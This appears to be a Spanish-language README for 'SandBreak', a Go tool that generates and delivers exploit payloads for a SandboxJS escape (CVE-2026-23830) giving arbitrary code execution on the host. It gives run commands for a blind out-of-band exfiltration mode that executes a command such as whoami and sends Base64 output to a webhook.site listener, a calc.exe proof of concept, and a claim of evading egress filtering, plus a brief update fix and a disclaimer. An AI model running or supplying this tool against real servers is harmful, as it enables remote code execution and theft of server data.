
Genera y entrega payloads de explotación para CVE-2026-23830, una evasión de SandboxJS, con modos para exfiltración OOB ciega y PoC de calc local. Admite listeners HTTP/HTTPS y produce payloads de JavaScript minificados.
SandBreak es una herramienta robusta de generación de exploits basada en Go, diseñada para aprovechar la vulnerabilidad de escape de SandboxJS (CVE-2026-23830).
Esta herramienta explota el constructor AsyncFunction sin protección en versiones antiguas de sandboxjs, permitiendo a los atacantes salir del entorno sandbox de V8 y ejecutar código arbitrario en el sistema host. Soporta múltiples modos de payload, incluyendo Exfiltración OOB Ciega, Defacement y RCE Basado en Errores.
oob: Exfiltración de datos fuera de banda (HTTP/HTTPS) para escenarios ciegos.calc: Abre calc.exe (PoC clásico).Clona el repositorio y ejecuta:
git clone https://github.com/Galaxy-sc/CVE-2026-23830-SandBreak.git
cd CVE-2026-23830-SandBreak
go run CVE-2026-23830.go
go run CVE-2026-23830.go -mode [MODE] -cmd [COMMAND] [OPTIONS]
Úsalo cuando no tengas retroalimentación de salida. Ejecuta el comando y envía el resultado codificado en Base64 a tu listener (por ejemplo, webhook.site).
go run CVE-2026-23830.go -mode oob -cmd "whoami" -url "https://webhook.site/YOUR-UUID"
Omite con éxito los fallos básicos de filtrado de egreso manejando errores de red.
Abre una calculadora en el servidor Windows.
go run CVE-2026-23830.go -mode calc
El atacante recibe los datos del usuario del servidor a través de Webhook a pesar de no haber salida visual en el sitio.
Esta herramienta está creada únicamente con Fines Educativos y para Pruebas de Penetración Autorizadas.
Actualiza sandboxjs a la última versión donde el constructor AsyncFunction esté correctamente aislado en sandbox.
npm update sandboxjs
Autor: Meysam Bal-afkan
Licencia: MIT